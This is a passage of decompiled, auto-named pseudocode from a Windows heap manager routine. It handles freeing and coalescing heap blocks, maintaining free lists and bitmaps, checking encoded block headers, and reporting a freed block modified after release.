																						_t1754 = _v116;
																						continue;
																					}
																					L382:
																					_v72 = 1;
																					_t1579 = _v116;
																					_t1805 = _t1518 + _t1885 * 8;
																					__eflags = _t1579;
																					if(_t1579 != 0) {
																						_t1219 = _t1805[1];
																						_v111 = _t1219;
																						__eflags = _t1219 & 0x00000004;
																						if((_t1219 & 0x00000004) != 0) {
																							_t1589 = _t1518 + _t1885 * 8;
																							_t1253 = ( *(_t1518 + _t1885 * 8) & 0x0000ffff) * 8 - 0x10;
																							_v192 = _t1253;
																							__eflags = _v111 & 0x00000002;
																							if((_v111 & 0x00000002) != 0) {
																								__eflags = _t1253 - 4;
																								if(_t1253 > 4) {
																									_t1253 = _t1253 - 4;
																									__eflags = _t1253;
																									_v192 = _t1253;
																								}
																							}
																							_t1255 = E0512D540( &(_t1589[8]), _t1253, 0xfeeefeee);
																							_v32 = _t1255;
																							__eflags = _t1255 - _v192;
																							if(_t1255 == _v192) {
																								_t1805 = _t1518 + _t1885 * 8;
																							} else {
																								_t1590 =  *[fs:0x30];
																								__eflags =  *(_t1590 + 0xc);
																								if( *(_t1590 + 0xc) == 0) {
																									_push("HEAP: ");
																									E050DB150();
																									_t1940 = _t1937 + 4;
																								} else {
																									E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
																									_t1940 = _t1937 + 8;
																								}
																								_push(_v32 + 0x10 + _t1518 + _t1885 * 8);
																								E050DB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t1518 + _t1885 * 8);
																								_t1937 = _t1940 + 0xc;
																								_t1261 =  *[fs:0x30];
																								_t1805 = _t1518 + _t1885 * 8;
																								__eflags =  *((char*)(_t1261 + 2));
																								if( *((char*)(_t1261 + 2)) != 0) {
																									 *0x51c6378 = 1;
																									 *0x51c60c0 = _t1805;
																									asm("int3");
																									 *0x51c6378 = 0;
																								}
																							}
																							_t1579 = _v116;
																						}
																					}
																					 *(_t1518 + 2) = _t1805[1];
																					_t1807 = ( *_t1805 & 0x0000ffff) + _t1885;
																					_v32 = _t1807;
																					_t1221 = _t1807 & 0x0000ffff;
																					_v32 = _t1807 & 0x0000ffff;
																					__eflags = _t1807 - 0xfe00;
																					if(_t1807 > 0xfe00) {
																						E050FA830(_t1871, _t1518, _t1807);
																						goto L136;
																					} else {
																						 *_t1518 = _t1807;
																						_t1892 = _t1221;
																						 *(_t1518 + 4 + _t1807 * 8) =  *(_t1871 + 0x54) ^ _v32;
																						__eflags = _t1579;
																						if(_t1579 != 0) {
																							 *(_t1518 + 2) =  *(_t1518 + 2) & 0x000000f0;
																							 *(_t1518 + 7) = 0;
																							__eflags =  *(_t1871 + 0x40) & 0x00000040;
																							if(( *(_t1871 + 0x40) & 0x00000040) != 0) {
																								_t969 = _t1518 + 0x10; // 0x10
																								E0512D5E0(_t969, _t1892 * 8 - 0x10, 0xfeeefeee);
																								_t970 = _t1518 + 2;
																								 *_t970 =  *(_t1518 + 2) | 0x00000004;
																								__eflags =  *_t970;
																							}
																							_t1227 = _t1871 + 0xc0;
																							__eflags =  *(_t1871 + 0xb4);
																							if( *(_t1871 + 0xb4) == 0) {
																								_t1581 =  *_t1227;
																							} else {
																								_t1581 = E050FE12C(_t1871, _t1892);
																								_t1227 = _t1871 + 0xc0;
																							}
																							while(1) {
																								__eflags = _t1227 - _t1581;
																								if(_t1227 == _t1581) {
																									break;
																								}
																								__eflags =  *(_t1871 + 0x4c);
																								if( *(_t1871 + 0x4c) == 0) {
																									_t1811 =  *(_t1581 - 8);
																								} else {
																									_t1811 =  *(_t1581 - 8);
																									_v132 = _t1811;
																									__eflags =  *(_t1871 + 0x4c) & _t1811;
																									if(( *(_t1871 + 0x4c) & _t1811) != 0) {
																										_t1811 = _t1811 ^  *(_t1871 + 0x50);
																										_v132 = _t1811;
																									}
																								}
																								_v136 = _t1811;
																								__eflags = _t1892 - (_t1811 & 0x0000ffff);
																								if(_t1892 <= (_t1811 & 0x0000ffff)) {
																									break;
																								} else {
																									_t1581 =  *_t1581;
																									_t1227 = _t1871 + 0xc0;
																									continue;
																								}
																							}
																							_t986 = _t1518 + 8; // 0x8
																							_t1893 = _t986;
																							_t1228 =  *((intOrPtr*)(_t1581 + 4));
																							_t1809 =  *_t1228;
																							__eflags = _t1809 - _t1581;
																							if(_t1809 != _t1581) {
																								_push(_t1581);
																								__eflags = 0;
																								E0519A80D(0, _t1581, 0, _t1809);
																							} else {
																								 *_t1893 = _t1581;
																								 *((intOrPtr*)(_t1893 + 4)) = _t1228;
																								 *_t1228 = _t1893;
																								 *((intOrPtr*)(_t1581 + 4)) = _t1893;
																							}
																							 *(_t1871 + 0x74) =  *(_t1871 + 0x74) + ( *_t1518 & 0x0000ffff);
																							_t1765 =  *(_t1871 + 0xb4);
																							__eflags = _t1765;
																							if(_t1765 == 0) {
																								L134:
																								__eflags =  *(_t1871 + 0x4c);
																								if( *(_t1871 + 0x4c) != 0) {
																									 *(_t1518 + 3) =  *(_t1518 + 2) ^  *(_t1518 + 1) ^  *_t1518;
																									 *_t1518 =  *_t1518 ^  *(_t1871 + 0x50);
																									__eflags =  *_t1518;
																								}
																								L136:
																								_v112 = 1;
																								_v71 = 0;
																								goto L137;
																							} else {
																								_t1583 =  *_t1518 & 0x0000ffff;
																								while(1) {
																									__eflags = _t1583 -  *((intOrPtr*)(_t1765 + 4));
																									if(_t1583 <  *((intOrPtr*)(_t1765 + 4))) {
																										break;
																									}
																									_t1235 =  *_t1765;
																									__eflags = _t1235;
																									if(_t1235 != 0) {
																										_t1765 = _t1235;
																										continue;
																									}
																									_t1236 =  *((intOrPtr*)(_t1765 + 4)) - 1;
																									__eflags = _t1236;
																									L520:
																									_v272 = _t1236;
																									L329:
																									E050FE4A0(_t1871, _t1765, 1, _t1893, _t1236, _t1583);
																									goto L134;
																								}
																								_t1236 = _t1583;
																								goto L520;
																							}
																						}
																						 *(_t1518 + 2) = _t1579;
																						 *(_t1518 + 7) = _t1579;
																						_t1244 = _t1871 + 0xc0;
																						__eflags =  *(_t1871 + 0xb4);
																						if( *(_t1871 + 0xb4) == 0) {
																							_t1586 =  *_t1244;
																						} else {
																							_t1586 = E050FE12C(_t1871, _t1892);
																							_t1244 = _t1871 + 0xc0;
																						}
																						while(1) {
																							__eflags = _t1244 - _t1586;
																							if(_t1244 == _t1586) {
																								break;
																							}
																							__eflags =  *(_t1871 + 0x4c);
																							if( *(_t1871 + 0x4c) == 0) {
																								_t1813 =  *(_t1586 - 8);
																							} else {
																								_t1813 =  *(_t1586 - 8);
																								_v92 = _t1813;
																								__eflags =  *(_t1871 + 0x4c) & _t1813;
																								if(( *(_t1871 + 0x4c) & _t1813) != 0) {
																									_t1813 = _t1813 ^  *(_t1871 + 0x50);
																									_v92 = _t1813;
																								}
																							}
																							_v138 = _t1813;
																							__eflags = _t1892 - (_t1813 & 0x0000ffff);
																							if(_t1892 <= (_t1813 & 0x0000ffff)) {
																								break;
																							} else {
																								_t1586 =  *_t1586;
																								_t1244 = _t1871 + 0xc0;
																								continue;
																							}
																						}
																						_t803 = _t1518 + 8; // 0x8
																						_t1893 = _t803;
																						_t1246 =  *((intOrPtr*)(_t1586 + 4));
																						_t1814 =  *_t1246;
																						__eflags = _t1814 - _t1586;
																						if(_t1814 != _t1586) {
																							_push(_t1586);
																							E0519A80D(0, _t1586, 0, _t1814);
																						} else {
																							 *_t1893 = _t1586;
																							 *((intOrPtr*)(_t1893 + 4)) = _t1246;
																							 *_t1246 = _t1893;
																							 *((intOrPtr*)(_t1586 + 4)) = _t1893;
																						}
																						 *(_t1871 + 0x74) =  *(_t1871 + 0x74) + ( *_t1518 & 0x0000ffff);
																						_t1765 =  *(_t1871 + 0xb4);
																						__eflags = _t1765;
																						if(_t1765 == 0) {
																							goto L134;
																						} else {
																							_t1583 =  *_t1518 & 0x0000ffff;
																							while(1) {
																								__eflags = _t1583 -  *((intOrPtr*)(_t1765 + 4));
																								if(_t1583 <  *((intOrPtr*)(_t1765 + 4))) {
																									break;
																								}
																								_t1249 =  *_t1765;
																								__eflags = _t1249;
																								if(_t1249 != 0) {
																									_t1765 = _t1249;
																									continue;
																								}
																								_t1236 =  *((intOrPtr*)(_t1765 + 4)) - 1;
																								__eflags = _t1236;
																								L395:
																								_v268 = _t1236;
																								goto L329;
																							}
																							_t1236 = _t1583;
																							goto L395;
																						}
																					}
																				}
																				_t1594 =  *_t1577 & 0x0000ffff;
																				while(1) {
																					__eflags = _t1594 -  *((intOrPtr*)(_t1802 + 4));
																					if(_t1594 <  *((intOrPtr*)(_t1802 + 4))) {
																						break;
																					}
																					_t1269 =  *_t1802;
																					__eflags = _t1269;
																					if(_t1269 != 0) {
																						_t1802 = _t1269;
																						continue;
																					}
																					_t1267 =  *((intOrPtr*)(_t1802 + 4)) - 1;
																					__eflags = _t1267;
																					L380:
																					_v264 = _t1267;
																					E050FBC04(_t1871, _t1802, 1, _v32, _t1267, _t1594);
																					_t1577 = _t1518 + _t1885 * 8;
																					goto L381;
																				}
																				_t1267 = _t1594;
																				goto L380;
																			}
																		}
																		_t1894 = _t1885 & 0x0000ffff;
																		_v48 = _t1894;
																		_t1577[2] =  *(_t1871 + 0x54) ^ _t1894;
																		__eflags = _t1754;
																		if(_t1754 != 0) {
																			 *(_t1518 + 2) =  *(_t1518 + 2) & 0x000000f0;
																			 *(_t1518 + 7) = 0;
																			__eflags =  *(_t1871 + 0x40) & 0x00000040;
																			if(( *(_t1871 + 0x40) & 0x00000040) != 0) {
																				_t911 = _t1518 + 0x10; // 0x10
																				E0512D5E0(_t911, _t1894 * 8 - 0x10, 0xfeeefeee);
																				 *(_t1518 + 2) =  *(_t1518 + 2) | 0x00000004;
																			}
																			_t1281 = _t1871 + 0xc0;
																			__eflags =  *(_t1871 + 0xb4);
																			if( *(_t1871 + 0xb4) == 0) {
																				_t1601 =  *_t1281;
																			} else {
																				_t1601 = E050FE12C(_t1871, _t1894);
																				_t1281 = _t1871 + 0xc0;
																			}
																			while(1) {
																				__eflags = _t1281 - _t1601;
																				if(_t1281 == _t1601) {
																					break;
																				}
																				__eflags =  *(_t1871 + 0x4c);
																				if( *(_t1871 + 0x4c) == 0) {
																					_t1766 =  *(_t1601 - 8);
																				} else {
																					_t1766 =  *(_t1601 - 8);
																					_v156 = _t1766;
																					__eflags =  *(_t1871 + 0x4c) & _t1766;
																					if(( *(_t1871 + 0x4c) & _t1766) != 0) {
																						_t1766 = _t1766 ^  *(_t1871 + 0x50);
																						__eflags = _t1766;
																						_v156 = _t1766;
																					}
																				}
																				_v134 = _t1766;
																				__eflags = _t1894 - (_t1766 & 0x0000ffff);
																				if(_t1894 > (_t1766 & 0x0000ffff)) {
																					_t1601 =  *_t1601;
																					_t1281 = _t1871 + 0xc0;
																					continue;
																				} else {
																					break;
																				}
																			}
																			_t674 = _t1518 + 8; // 0x8
																			_t1893 = _t674;
																			_t1282 =  *((intOrPtr*)(_t1601 + 4));
																			_t1763 =  *_t1282;
																			__eflags = _t1763 - _t1601;
																			if(_t1763 != _t1601) {
																				_push(_t1601);
																				E0519A80D(0, _t1601, 0, _t1763);
																			} else {
																				 *_t1893 = _t1601;
																				 *((intOrPtr*)(_t1893 + 4)) = _t1282;
																				 *_t1282 = _t1893;
																				 *((intOrPtr*)(_t1601 + 4)) = _t1893;
																			}
																			 *(_t1871 + 0x74) =  *(_t1871 + 0x74) + ( *_t1518 & 0x0000ffff);
																			_t1765 =  *(_t1871 + 0xb4);
																			__eflags = _t1765;
																			if(_t1765 == 0) {
																				goto L134;
																			} else {
																				_t1583 =  *_t1518 & 0x0000ffff;
																				while(1) {
																					__eflags = _t1583 -  *((intOrPtr*)(_t1765 + 4));
																					if(_t1583 <  *((intOrPtr*)(_t1765 + 4))) {
																						break;
																					}
																					_t1285 =  *_t1765;
																					__eflags = _t1285;
																					if(_t1285 == 0) {
																						_t1236 =  *((intOrPtr*)(_t1765 + 4)) - 1;
																						L328:
																						_v260 = _t1236;
																						goto L329;
																					}
																					_t1765 = _t1285;
																				}
																				_t1236 = _t1583;
																				goto L328;
																			}
																		}
																		 *(_t1518 + 2) = _t1754;
																		 *(_t1518 + 7) = _t1754;
																		_t1289 = _t1871 + 0xc0;
																		_t1604 =  *(_t1871 + 0xb4);
																		_v36 = _t1604;
																		__eflags = _t1604;
																		if(_t1604 == 0) {
																			_t1895 =  *_t1289;
																			goto L119;
																		} else {
																			while(1) {
																				_t1315 =  *((intOrPtr*)(_t1604 + 4));
																				__eflags = _t1894 - _t1315;
																				if(_t1894 < _t1315) {
																					_v172 = _t1894;
																					_t1316 = _t1894;
																					break;
																				}
																				_t1784 =  *_t1604;
																				__eflags = _t1784;
																				if(_t1784 == 0) {
																					_t1316 = _t1315 - 1;
																					__eflags = _t1316;
																					L201:
																					_v172 = _t1316;
																					break;
																				} else {
																					_t1604 = _t1784;
																					_v36 = _t1604;
																					continue;
																				}
																			}
																			_v64 = _t1316;
																			_v52 = _t1316 -  *(_t1604 + 0x14);
																			_t1785 =  *(_t1604 + 0x18);
																			_v40 = _t1785;
																			_t1318 =  *((intOrPtr*)(_t1785 + 4));
																			__eflags = _t1785 - _t1318;
																			if(_t1785 == _t1318) {
																				_t1895 = _t1785;
																			} else {
																				_t1319 = _t1318 + 0xfffffff8;
																				_v32 = _t1319;
																				_t1320 =  *_t1319;
																				_v412 = _t1320;
																				_t1617 = _t1320 & 0x0000ffff;
																				__eflags =  *(_t1871 + 0x4c);
																				if( *(_t1871 + 0x4c) != 0) {
																					_t1799 =  *(_t1871 + 0x50) ^ _t1320;
																					_v412 = _t1799;
																					_t1364 = _t1799 & 0x0000ffff;
																					_v44 = _t1364;
																					_v68 = _t1364 & 0x0000ffff;
																					_t1648 = _t1799 >> 0x00000010 ^ _t1799 >> 0x00000008 ^ _t1799;
																					__eflags = _t1799 >> 0x18 - _t1648;
																					if(_t1799 >> 0x18 != _t1648) {
																						_push(_t1648);
																						E0519A80D(_t1871, _v32, 0, 0);
																						_t1617 = _v44 & 0x0000ffff;
																					} else {
																						_t1617 = _v68;
																					}
																					_t1785 = _v40;
																				}
																				_t1619 = _v48 - (_t1617 & 0x0000ffff);
																				_v324 = _t1619;
																				__eflags = _t1619;
																				if(_t1619 > 0) {
																					_t1895 = _t1785;
																					L116:
																					_t1604 = _v36;
																				} else {
																					_t1323 =  *_t1785 + 0xfffffff8;
																					_v32 = _t1323;
																					_t1324 =  *_t1323;
																					_v420 = _t1324;
																					_t1620 = _t1324 & 0x0000ffff;
																					__eflags =  *(_t1871 + 0x4c);
																					if( *(_t1871 + 0x4c) != 0) {
																						_t1795 =  *(_t1871 + 0x50) ^ _t1324;
																						_v420 = _t1795;
																						_t1358 = _t1795 & 0x0000ffff;
																						_v44 = _t1358;
																						_v68 = _t1358 & 0x0000ffff;
																						_t1643 = _t1795 >> 0x00000010 ^ _t1795 >> 0x00000008 ^ _t1795;
																						__eflags = _t1795 >> 0x18 - _t1643;
																						if(_t1795 >> 0x18 != _t1643) {
																							_push(_t1643);
																							E0519A80D(_t1871, _v32, 0, 0);
																							_t1620 = _v44 & 0x0000ffff;
																						} else {
																							_t1620 = _v68;
																						}
																						_t1785 = _v40;
																					}
																					_t1622 = _v48 - (_t1620 & 0x0000ffff);
																					_v328 = _t1622;
																					__eflags = _t1622;
																					_t1604 = _v36;
																					if(_t1622 <= 0) {
																						_t1895 =  *_t1785;
																						L117:
																						__eflags = _t1895;
																						if(_t1895 == 0) {
																							L211:
																							_t1604 =  *_t1604;
																							_v36 = _t1604;
																							_t1316 =  *(_t1604 + 0x14);
																							goto L201;
																						}
																						_t1289 = _t1871 + 0xc0;
																						L119:
																						_t1605 = _v48;
																						while(1) {
																							__eflags = _t1289 - _t1895;
																							if(_t1289 == _t1895) {
																								break;
																							}
																							__eflags =  *(_t1871 + 0x4c);
																							if( *(_t1871 + 0x4c) == 0) {
																								_t1768 =  *(_t1895 - 8);
																							} else {
																								_t1768 =  *(_t1895 - 8);
																								_v164 = _t1768;
																								__eflags =  *(_t1871 + 0x4c) & _t1768;
																								if(( *(_t1871 + 0x4c) & _t1768) != 0) {
																									_t1768 = _t1768 ^  *(_t1871 + 0x50);
																									__eflags = _t1768;
																									_v164 = _t1768;
																								}
																							}
																							_v166 = _t1768;
																							__eflags = _t1605 - (_t1768 & 0x0000ffff);
																							if(_t1605 <= (_t1768 & 0x0000ffff)) {
																								break;
																							} else {
																								_t1895 =  *_t1895;
																								_t1289 = _t1871 + 0xc0;
																								continue;
																							}
																						}
																						_t283 = _t1518 + 8; // 0x8
																						_t1291 = _t283;
																						_t1606 =  *(_t1895 + 4);
																						_t1769 =  *_t1606;
																						__eflags = _t1769 - _t1895;
																						if(_t1769 != _t1895) {
																							_push(_t1606);
																							E0519A80D(0, _t1895, 0, _t1769);
																						} else {
																							 *_t1291 = _t1895;
																							_t1291[1] = _t1606;
																							 *_t1606 = _t1291;
																							 *(_t1895 + 4) = _t1291;
																						}
																						 *(_t1871 + 0x74) =  *(_t1871 + 0x74) + ( *_t1518 & 0x0000ffff);
																						_t1608 =  *(_t1871 + 0xb4);
																						_v48 = _t1608;
																						__eflags = _t1608;
																						if(_t1608 == 0) {
																							goto L134;
																						} else {
																							_t1896 =  *_t1518 & 0x0000ffff;
																							while(1) {
																								_t1294 =  *((intOrPtr*)(_t1608 + 4));
																								__eflags = _t1896 - _t1294;
																								if(_t1896 < _t1294) {
																									break;
																								}
																								_t1771 =  *_t1608;
																								__eflags = _t1771;
																								if(_t1771 == 0) {
																									_t1295 = _t1294 - 1;
																									_v256 = _t1295;
																									L127:
																									_v88 = _t1295;
																									_t1773 = _t1295 -  *((intOrPtr*)(_t1608 + 0x14));
																									_v40 = _t1773;
																									__eflags =  *(_t1608 + 8);
																									if( *(_t1608 + 8) != 0) {
																										_v36 = _t1773 + _t1773;
																									} else {
																										_v36 = _t1773;
																									}
																									 *((intOrPtr*)(_t1608 + 0xc)) =  *((intOrPtr*)(_t1608 + 0xc)) + 1;
																									_v128 =  *( *((intOrPtr*)(_t1608 + 0x20)) + _v36 * 4);
																									__eflags = _v88 -  *((intOrPtr*)(_t1608 + 4)) - 1;
																									_t1775 = _v40;
																									if(_v88 ==  *((intOrPtr*)(_t1608 + 4)) - 1) {
																										 *((intOrPtr*)(_t1608 + 0x10)) =  *((intOrPtr*)(_t1608 + 0x10)) + 1;
																									}
																									_t1301 = _v128;
																									__eflags = _t1301;
																									if(_t1301 != 0) {
																										_t1302 = _t1301 + 0xfffffff8;
																										_v32 = _t1302;
																										_t1303 =  *_t1302;
																										_v436 = _t1303;
																										_v64 = _t1303 & 0x0000ffff;
																										__eflags =  *(_t1871 + 0x4c);
																										_t1775 = _v40;
																										if( *(_t1871 + 0x4c) != 0) {
																											_t1781 =  *(_t1871 + 0x50) ^ _t1303;
																											_v436 = _t1781;
																											_t1309 = _t1781 & 0x0000ffff;
																											_v44 = _t1309;
																											_v64 = _t1309 & 0x0000ffff;
																											_t1614 = _t1781 >> 0x00000010 ^ _t1781 >> 0x00000008 ^ _t1781;
																											__eflags = _t1781 >> 0x18 - _t1614;
																											if(_t1781 >> 0x18 != _t1614) {
																												_push(_t1614);
																												E0519A80D(_t1871, _v32, 0, 0);
																												_v64 = _v44 & 0x0000ffff;
																											}
																											_t1775 = _v40;
																											_t1608 = _v48;
																										}
																										_t1897 = _t1896 - (_v64 & 0x0000ffff);
																										_v336 = _t1897;
																										__eflags = _t1897;
																										if(_t1897 <= 0) {
																											goto L131;
																										} else {
																											goto L132;
																										}
																									} else {
																										L131:
																										_t310 = _t1518 + 8; // 0x8
																										 *( *((intOrPtr*)(_t1608 + 0x20)) + _v36 * 4) = _t310;
																										L132:
																										__eflags = _v128;
																										if(_v128 == 0) {
																											_t1900 = _t1775 >> 5;
																											_v40 = _t1775 & 0x0000001f;
																											_t318 = _v48 + 0x1c; // 0xffffbba0
																											_t1308 =  *_t318;
																											_t319 = _t1308 + _t1900 * 4;
																											 *_t319 =  *(_t1308 + _t1900 * 4) | 0x00000001 << _v40;
																											__eflags =  *_t319;
																										}
																										goto L134;
																									}
																								}
																								_t1608 = _t1771;
																								_v48 = _t1608;
																							}
																							_v256 = _t1896;
																							_t1295 = _t1896;
																							goto L127;
																						}
																					}
																					__eflags =  *_t1604;
																					if( *_t1604 == 0) {
																						__eflags = _v64 -  *((intOrPtr*)(_t1604 + 4)) - 1;
																						if(_v64 !=  *((intOrPtr*)(_t1604 + 4)) - 1) {
																							goto L107;
																						}
																						__eflags =  *(_t1604 + 8);
																						if( *(_t1604 + 8) != 0) {
																							_v52 = _v52 + _v52;
																						}
																						_t1347 =  *((intOrPtr*)( *((intOrPtr*)(_t1604 + 0x20)) + _v52 * 4));
																						while(1) {
																							_v64 = _t1347;
																							__eflags = _t1785 - _t1347;
																							if(_t1785 == _t1347) {
																								goto L116;
																							}
																							_t1348 = _t1347 + 0xfffffff8;
																							_v32 = _t1348;
																							_t1349 =  *_t1348;
																							_v428 = _t1349;
																							_t1632 = _t1349 & 0x0000ffff;
																							__eflags =  *(_t1871 + 0x4c);
																							if( *(_t1871 + 0x4c) != 0) {
																								_t1791 =  *(_t1871 + 0x50) ^ _t1349;
																								_v428 = _t1791;
																								_t1352 = _t1791 & 0x0000ffff;
																								_v44 = _t1352;
																								_v68 = _t1352 & 0x0000ffff;
																								_t1638 = _t1791 >> 0x00000010 ^ _t1791 >> 0x00000008 ^ _t1791;
																								__eflags = _t1791 >> 0x18 - _t1638;
																								if(_t1791 >> 0x18 != _t1638) {
																									_push(_t1638);
																									E0519A80D(_t1871, _v32, 0, 0);
																									_t1632 = _v44 & 0x0000ffff;
																								} else {
																									_t1632 = _v68;
																								}
																								_t1785 = _v40;
																							}
																							_t1634 = _v48 - (_t1632 & 0x0000ffff);
																							_v332 = _t1634;
																							__eflags = _t1634;
																							if(_t1634 > 0) {
																								_t1347 =  *_v64;
																								continue;
																							} else {
																								_t1895 = _v64;
																								_t1604 = _v36;
																								goto L117;
																							}
																						}
																						goto L116;
																					}
																					L107:
																					_t1787 = _v52 >> 5;
																					_v44 = ( *((intOrPtr*)(_t1604 + 4)) -  *(_t1604 + 0x14) >> 5) - 1;
																					_t1333 =  *((intOrPtr*)(_t1604 + 0x1c)) + _t1787 * 4;
																					_v32 = 1;
																					_t1628 =  !((1 << (_v52 & 0x0000001f)) - 1) &  *_t1333;
																					__eflags = _t1628;
																					_t1904 = _v44;
																					while(1) {
																						_v252 = _t1333;
																						_v188 = _t1787;
																						__eflags = _t1628;
																						if(_t1628 != 0) {
																							break;
																						}
																						__eflags = _t1787 - _t1904;
																						if(_t1787 > _t1904) {
																							__eflags = _t1628;
																							if(_t1628 != 0) {
																								break;
																							}
																							_t1604 = _v36;
																							goto L211;
																						} else {
																							_t1333 =  &(_t1333[1]);
																							_t1628 =  *_t1333;
																							_t1787 = _t1787 + 1;
																							continue;
																						}
																					}
																					__eflags = _t1628;
																					if(_t1628 == 0) {
																						_t1336 = _t1628 >> 0x00000010 & 0x000000ff;
																						__eflags = _t1336;
																						if(_t1336 != 0) {
																							_t1338 = ( *(_t1336 + 0x50b84d0) & 0x000000ff) + 0x10;
																						} else {
																							_t424 = (_t1628 >> 0x18) + 0x50b84d0; // 0x10008
																							_t1338 = ( *_t424 & 0x000000ff) + 0x18;
																						}
																					} else {
																						_t1341 = _t1628 & 0x000000ff;
																						__eflags = _t1628;
																						if(_t1628 == 0) {
																							_t1338 = ( *((_t1628 >> 0x00000008 & 0x000000ff) + 0x50b84d0) & 0x000000ff) + 8;
																						} else {
																							_t1338 =  *(_t1341 + 0x50b84d0) & 0x000000ff;
																						}
																					}
																					_t1789 = (_t1787 << 5) + _t1338;
																					_v188 = _t1789;
																					_t1604 = _v36;
																					__eflags =  *(_t1604 + 8);
																					if( *(_t1604 + 8) != 0) {
																						_t1789 = _t1789 + _t1789;
																					}
																					_t1895 =  *( *((intOrPtr*)(_t1604 + 0x20)) + _t1789 * 4);
																				}
																			}
																			goto L117;
																		}
																	}
																}
															}
															_t1654 =  *_t1518 & 0x0000ffff;
															while(1) {
																_t550 = _t1740 + 4; // 0x0
																_t1384 =  *_t550;
																__eflags = _t1654 - _t1384;
																if(_t1654 < _t1384) {
																	break;
																}
																_t1906 =  *_t1740;
																_v44 = _t1906;
																__eflags = _t1906;
																_t1883 = _v32;
																if(_t1906 == 0) {
																	_t554 = _t1384 - 1; // -1
																	_t1654 = _t554;
																	break;
																}
																_t1740 = _v44;
															}
															_v240 = _t1654;
															_t556 = _t1518 + 8; // 0x8
															E050FBC04(_t1871, _t1740, 1, _t556, _t1654,  *_t1518 & 0x0000ffff);
															_t1567 = _v88;
															goto L258;
														}
														_t1518 = _t1882 - 8;
														_v100 = _t1518;
														__eflags =  *(_t1871 + 0x4c);
														if( *(_t1871 + 0x4c) != 0) {
															 *_t1518 =  *_t1518 ^  *(_t1871 + 0x50);
															__eflags =  *(_t1518 + 3) - ( *(_t1518 + 2) ^  *(_t1518 + 1) ^  *_t1518);
															if(__eflags != 0) {
																_push(_t1564);
																E0518FA2B(_t1518, _t1871, _t1518, _t1871, _t1882, __eflags);
															}
														}
														_t1656 =  *_t1518 & 0x0000ffff;
														__eflags = _t1656 - _v52;
														if(_t1656 < _v52) {
															__eflags =  *(_t1871 + 0x4c);
															if( *(_t1871 + 0x4c) != 0) {
																 *(_t1518 + 3) =  *(_t1518 + 2) ^  *(_t1518 + 1) ^  *_t1518;
																 *_t1518 =  *_t1518 ^  *(_t1871 + 0x50);
															}
															goto L248;
														}
														_t115 = _t1518 + 8; // 0x8
														_t1392 = _t115;
														_v44 = _t1392;
														_t1393 =  *_t1392;
														_v160 = _t1393;
														_t1820 =  *(_t1518 + 0xc);
														_v152 = _t1820;
														_t1821 =  *_t1820;
														_t1907 =  *((intOrPtr*)(_t1393 + 4));
														__eflags = _t1821 - _t1907;
														if(_t1821 != _t1907) {
															L440:
															_push(_t1656);
															_t858 = _t1518 + 8; // 0x8
															_t1546 = 0xd;
															_t1074 = E0519A80D(_t1871, _t858, _t1907, _t1821);
															_v70 = 0;
															goto L153;
														}
														_t121 = _t1518 + 8; // 0x8
														__eflags = _t1821 - _t121;
														if(_t1821 != _t121) {
															goto L440;
														}
														 *(_t1871 + 0x74) =  *(_t1871 + 0x74) - _t1656;
														_t1657 =  *(_t1871 + 0xb4);
														_v36 = _t1657;
														__eflags = _t1657;
														if(_t1657 == 0) {
															L74:
															_t1396 = _v160;
															_t1658 = _v152;
															 *_t1658 = _t1396;
															 *(_t1396 + 4) = _t1658;
															__eflags =  *(_t1518 + 2) & 0x00000008;
															if(( *(_t1518 + 2) & 0x00000008) != 0) {
																_t1397 = E050FA229(_t1871, _t1518);
																__eflags = _t1397;
																if(_t1397 != 0) {
																	goto L75;
																}
																_t1546 = _t1871;
																_t1074 = E050FA309(_t1871, _t1518,  *_t1518 & 0x0000ffff, 1);
																_v70 = 0;
																goto L153;
															}
															L75:
															_v70 = 1;
															goto L76;
														} else {
															_t1825 =  *_t1518 & 0x0000ffff;
															while(1) {
																_t1399 =  *((intOrPtr*)(_t1657 + 4));
																__eflags = _t1825 - _t1399;
																if(_t1825 < _t1399) {
																	break;
																}
																_t1908 =  *_t1657;
																__eflags = _t1908;
																if(_t1908 == 0) {
																	_t427 = _t1399 - 1; // -1
																	_t1825 = _t427;
																	break;
																} else {
																	_t1657 = _t1908;
																	_v36 = _t1657;
																	continue;
																}
															}
															_v232 = _t1825;
															_v108 =  *_t1518 & 0x0000ffff;
															_t1910 = _t1825 -  *((intOrPtr*)(_t1657 + 0x14));
															_v40 = _t1910;
															__eflags =  *(_t1657 + 8);
															if( *(_t1657 + 8) != 0) {
																_t1401 = _t1910 + _t1910;
															} else {
																_t1401 = _t1910;
															}
															_t1911 = _t1401 * 4;
															_v88 = _t1911;
															_t1403 =  *((intOrPtr*)(_t1657 + 0x20)) + _t1911;
															_v128 = _t1403;
															_v32 =  *_t1403;
															 *((intOrPtr*)(_t1657 + 0xc)) =  *((intOrPtr*)(_t1657 + 0xc)) - 1;
															_t1405 =  *((intOrPtr*)(_t1657 + 4));
															_t140 = _t1405 - 1; // -1
															_t1912 = _t140;
															_v68 = _t1912;
															__eflags = _t1825 - _t1912;
															if(_t1825 == _t1912) {
																 *((intOrPtr*)(_t1657 + 0x10)) =  *((intOrPtr*)(_t1657 + 0x10)) - 1;
															}
															__eflags = _v32 - _v44;
															if(_v32 != _v44) {
																goto L74;
															} else {
																_v236 = _t1405;
																__eflags =  *_t1657;
																if( *_t1657 == 0) {
																	_t1405 = _v68;
																	_v236 = _t1405;
																}
																_v48 =  *(_t1518 + 8);
																_v32 =  *((intOrPtr*)(_t1657 + 0x18));
																__eflags = _t1825 - _t1405;
																_t1916 = _v40;
																if(_t1825 >= _t1405) {
																	_t1406 = _v48;
																	_t1660 = _v128;
																	__eflags = _t1406 - _v32;
																	if(_t1406 != _v32) {
																		 *_t1660 = _t1406;
																		goto L74;
																	}
																	 *_t1660 = 0;
																	L73:
																	_t1917 = _t1916 >> 5;
																	_t1408 =  *((intOrPtr*)(_v36 + 0x1c));
																	_t172 = _t1408 + _t1917 * 4;
																	 *_t172 =  *(_t1408 + _t1917 * 4) &  !(1 << (_v40 & 0x0000001f));
																	__eflags =  *_t172;
																	goto L74;
																}
																_t1829 = _v48;
																__eflags = _t1829 -  *((intOrPtr*)(_t1657 + 0x18));
																if(_t1829 ==  *((intOrPtr*)(_t1657 + 0x18))) {
																	L72:
																	 *(_v88 +  *((intOrPtr*)(_t1657 + 0x20))) = 0;
																	goto L73;
																}
																_t1410 = _t1829 - 8;
																_v32 = _t1410;
																_t1411 =  *_t1410;
